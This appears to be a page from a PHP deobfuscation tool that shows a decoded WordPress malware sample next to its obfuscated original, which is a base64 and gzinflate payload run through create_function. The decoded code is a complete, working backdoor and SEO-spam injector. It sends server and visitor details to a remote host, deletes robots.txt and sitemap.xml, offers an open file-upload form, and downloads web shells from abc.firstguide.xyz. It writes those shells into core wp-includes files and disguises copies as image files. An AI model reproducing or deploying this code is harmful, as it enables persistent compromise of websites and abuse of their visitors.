Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $FAtqVNEJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$FAtqVNEJ[(105..
Decoded Output download
set_time_limit(0);
@ini_set("html_errors","0");
@ob_start();
$action = isset($_GET['ac']) ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
$index_name = basename($_SERVER['SCRIPT_NAME']);
write($index_name);
echo "write done!";
exit();
}
if ($action != "" && $action == "mup") {
fup($action);
exit();
}
$u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x51\x45\x49\x51\x46\x115\x116\x97\x114\x116\x103\x114\x101\x97\x116\x115\x101\x111\x46\x99\x111\x109\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x';
$group='ZQ3-13';
$wjt=0;
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){
$wjt=1;
}
$_SERVER=@str_replace(' ','',($_SERVER));
unset($_SERVER['PATH']);
unset($_SERVER['SYSTEMROOT']);
unset($_SERVER['COMSPEC']);
unset($_SERVER['PATHEXT']);
unset($_SERVER['WINDIR']);
unset($_SERVER['SERVER_SOFTWARE']);
$s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'';
$s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
//$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'';
$s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
$s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:'';
$s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';
$s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';
$s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:'';
$s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:'';
$s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:'';
$s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:'';
$s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:'';
$s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:'';
if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) {
$sj=serialize($s);
}else{
$sj=json_encode($s);
}
$info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion());
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){
@unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt');
}
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){
@unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml');
}
if($info){
if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){
header('Content-type:application/xml');
echo ($info);
exit();
}elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){
header('Content-Type: text/plain;charset=utf-8');
echo ($info);
exit();
}elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){
header('Content-type:application/xml');
echo ($info);
exit();
}else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){
if($map_uri[1]!="" && $map_uri[2]!="") {
if($info=='HTTP/1.1 404 Not Found'){
header($info);
header("Status: 404 Not Found");
exit();
}else {
header('Content-type:application/xml');
echo($info);
exit();
}
}
}elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){
//$google=json_decode($info,true);
$google=unserialize($info);
foreach ($google as $g){
$r = cgg($g);
if ($r == 'success' || (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) {
echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>';
} else {
echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>';
}
}
exit();
}
else{
header("Content-type: text/html; charset=utf-8");
if(substr($info,'0',9)==='Location:'){
header($info);
exit();
}elseif ($info=='HTTP/1.1 404 Not Found'){
} else{
if($info){
print_r($info);
exit();
}
}
}
}else{
//echo('500 error');
}
function cgg($url)
{
$contents = @file_get_contents($url);
if(!$contents) {
$header = array(
'Accept: */*',
'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$contents = curl_exec($curl);
curl_close($curl);
}
return $contents;
}
function o0($u){
$a=explode('\x',$u);
$u1='';
foreach ($a as $b){
if($b) {
$u1 .= chr($b);
}
}
return $u1;
}
function fup($g){
error_reporting(0);
if ($g == 'mup') {
$saw1 = $_FILES['file']['tmp_name'];
$saw2 = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
move_uploaded_file($saw1, $saw2);
exit(0);
}
}
function write($index_name)
{
$write1 = cgg("http://abc.firstguide.xyz/write1.txt");
$write2 = cgg("http://abc.firstguide.xyz/write2.txt");
$shell_postfs = cgg("http://abc.firstguide.xyz/mm1.txt");
$shell_load = cgg("http://abc.firstguide.xyz/mm2.txt");
$new_ht_content = cgg("http://abc.firstguide.xyz/shl/htaccess.txt");
$ht_content = file_get_contents(".htaccess");
$index_content = file_get_contents($index_name);
$loader_php = "wp-includes/template-loader.php";
$load_php = "wp-includes/load.php";
$font_editor_php = "wp-includes/SimplePie/index.php";
if (!is_dir("css")) {
mkdir("css", 0755, true);
}
if ($index_name != "index.php") {
$write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
$write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
}
@chmod("css/.htaccess", 0755);
file_put_contents("css/.htaccess", $new_ht_content);
file_put_contents("css/load.php", $shell_load);
if (is_dir("wp-includes/SimplePie")) {
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
$loader_content = file_get_contents($loader_php);
$load_content = file_get_contents($load_php);
@chmod($loader_php, 0755);
@chmod($load_php, 0755);
file_put_contents($loader_php, $write1 . $loader_content);
file_put_contents($load_php, $load_content . $write2);
@chmod($loader_php, 0644);
@chmod($load_php, 0644);
file_put_contents($font_editor_php, $shell_postfs);
}
}
?>
Did this file decode correctly?
Original Code
<?php $FAtqVNEJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$FAtqVNEJ[(105/15)].$FAtqVNEJ[(26-1)].$FAtqVNEJ[(1*49)].$FAtqVNEJ[((10*1)+18)].$FAtqVNEJ[(14+22)].$FAtqVNEJ[(44+5)].$FAtqVNEJ[(44-13)].$FAtqVNEJ[(684/18)].$FAtqVNEJ[(23+4)].$FAtqVNEJ[(72-(33-7))].$FAtqVNEJ[(154/22)].$FAtqVNEJ[(11+25)].$FAtqVNEJ[(65-(62-31))].$FAtqVNEJ[(26-6)].$FAtqVNEJ[((27*2)-8)];$pHFdNhg9688=$FAtqVNEJ[(20-9)].$FAtqVNEJ[(2*4)].$FAtqVNEJ[(29*1)].$FAtqVNEJ[(160/4)];$MYtraky2482=$FAtqVNEJ[(8*5)].$FAtqVNEJ[((1+0)+2)].$FAtqVNEJ[(6+(1*(95/19)))].$FAtqVNEJ[(140/5)].$FAtqVNEJ[(522/18)].$FAtqVNEJ[(7*((7-3)-2))].$FAtqVNEJ[(2*14)].$FAtqVNEJ[(138/(2+4))].$FAtqVNEJ[(1029/(378/18))].$FAtqVNEJ[((2*189)/9)].$FAtqVNEJ[(12+(0+0))].$FAtqVNEJ[(31*1)].$FAtqVNEJ[(48/(36/12))].$FAtqVNEJ[(735/15)].$FAtqVNEJ[(0+7)].$FAtqVNEJ[(18+2)].$FAtqVNEJ[(18-(10/5))].$FAtqVNEJ[(735/15)].$FAtqVNEJ[(0+(2-(1*1)))].$FAtqVNEJ[(16-(3+(36/(0+18))))].$FAtqVNEJ[((167-23)/18)].$FAtqVNEJ[(0+(18-9))].$FAtqVNEJ[(1*3)].$FAtqVNEJ[(11*(1+(0/(78/13))))].$FAtqVNEJ[(2*7)].$FAtqVNEJ[(29*(0+1))].$FAtqVNEJ[(38-(8+9))].$FAtqVNEJ[(15*2)].$FAtqVNEJ[(45-11)].$FAtqVNEJ[(1*46)].$FAtqVNEJ[(1*(17+21))].$FAtqVNEJ[(78/3)].$FAtqVNEJ[(21+(77/11))].$FAtqVNEJ[(22+14)].$FAtqVNEJ[(343/(91/13))].$FAtqVNEJ[(1*1)].$FAtqVNEJ[(21-10)].$FAtqVNEJ[(22+(12/2))].$FAtqVNEJ[(180/20)].$FAtqVNEJ[(3+((0+0)*1))].$FAtqVNEJ[(686/(126/9))].$FAtqVNEJ[(61-(32-8))].$FAtqVNEJ[(476/17)].$FAtqVNEJ[((4-0)+22)].$FAtqVNEJ[(((23-(2*5))/13)-0)].$FAtqVNEJ[(7+(84/21))].$FAtqVNEJ[(28/2)].$FAtqVNEJ[(9-0)].$FAtqVNEJ[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
Stats
MD5 | 8b679ed9a6032877ec48f550abe8448e |
Eval Count | 2 |
Decode Time | 204 ms |